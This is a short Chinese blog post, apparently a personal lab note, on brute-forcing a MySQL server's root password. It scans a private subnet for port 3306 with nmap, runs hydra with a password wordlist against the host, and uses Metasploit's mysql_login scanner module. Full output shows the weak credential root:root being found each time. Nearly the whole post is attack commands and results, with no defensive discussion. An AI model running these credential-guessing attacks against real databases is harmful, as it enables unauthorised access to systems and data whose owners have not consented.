Home > Archives > hydra

hydra

Publish:

mysql

1
2
3
4
5
6
mysql -h 主机名称 -u 用户名 -p
hydra -l 用户名 -P 密码字典路径 目标主机ip mysql

mysql -h 192.168.31.42 -u root -p

nmap -p 3306 192.168.31.0/24
1
2
3
4
5
Nmap scan report for WIN-T81MNRCRHJI (192.168.31.42)
Host is up (0.071s latency).

PORT     STATE SERVICE
3306/tcp open  mysql
1
hydra -l root -P '/home/kali/password.txt' 192.168.31.42 mysql
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ hydra -l root -P '/home/kali/password.txt' 192.168.31.42 mysql
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-07 01:48:16
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking mysql://192.168.31.42:3306/
[3306][mysql] host: 192.168.31.42   login: root   password: root
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-07 01:48:19

Metasploit(MSF渗透)

1
2
3
4
5
6
7
8
9
msfconsole
use auxiliary/scanner/mysql/mysql_login
show options

set rhosts 192.168.31.42
set rport 3306
set username root
set pass_file /home/kali/password.txt
run
1
2
3
4
5
6
7
8
[+] 192.168.31.42:3306    - 192.168.31.42:3306 - Found remote MySQL version 5.5.40
[!] 192.168.31.42:3306    - No active DB -- Credential data will not be saved!
[-] 192.168.31.42:3306    - 192.168.31.42:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'192.168.31.230' (using password: NO))
[-] 192.168.31.42:3306    - 192.168.31.42:3306 - LOGIN FAILED: root:1212 (Incorrect: Access denied for user 'root'@'192.168.31.230' (using password: YES))
[-] 192.168.31.42:3306    - 192.168.31.42:3306 - LOGIN FAILED: root:3424 (Incorrect: Access denied for user 'root'@'192.168.31.230' (using password: YES))
[+] 192.168.31.42:3306    - 192.168.31.42:3306 - Success: 'root:root'
[*] 192.168.31.42:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

声明: 本文采用 BY-NC-SA 授权。转载请注明转自: Ding Bao Guo